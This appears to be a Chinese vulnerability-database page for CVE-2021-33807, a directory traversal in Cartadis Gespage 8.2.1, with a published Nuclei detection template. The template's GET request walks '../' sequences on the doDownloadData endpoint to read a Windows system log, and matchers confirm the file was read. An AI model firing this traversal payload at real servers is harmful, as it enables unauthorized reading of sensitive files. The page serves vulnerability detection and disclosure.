CVE-2021-33807: Cartadis Gespage 8.2.1 - Directory Traversal

日期: 2025-08-01 | 影响软件: Cartadis Gespage | POC: 已公开

漏洞描述

Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.

PoC代码[已公开]

id: CVE-2021-33807

info:
  name: Cartadis Gespage 8.2.1 - Directory Traversal
  author: daffainfo
  severity: high
  description: Cartadis Gespage through 8.2.1 allows Directory Traversal in gespage/doDownloadData and gespage/webapp/doDownloadData.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further compromise of the system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the directory traversal vulnerability in Cartadis Gespage 8.2.1.
  reference:
    - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807
    - https://www.gespage.com/cartadis-db/
    - https://www.cartadis.com/gespage-website/
    - https://support.gespage.com/fr/support/solutions/articles/14000130201-security-advisory-gespage-directory-traversal
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-33807
    cwe-id: CWE-22
    epss-score: 0.57107
    epss-percentile: 0.98069
    cpe: cpe:2.3:a:gespage:gespage:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gespage
    product: gespage
  tags: cve2021,cve,lfi,gespage

http:
  - method: GET
    path:
      - "{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "NetpDoDomainJoin:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 490a0046304402202e22e936c28610e4ee577796290512f9ae61337719e8abbde438ef7c92c6a0ab022071caf8bf63aa8be80ed4ef76326abcadeec6488b1a776aba41037caa580e071e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐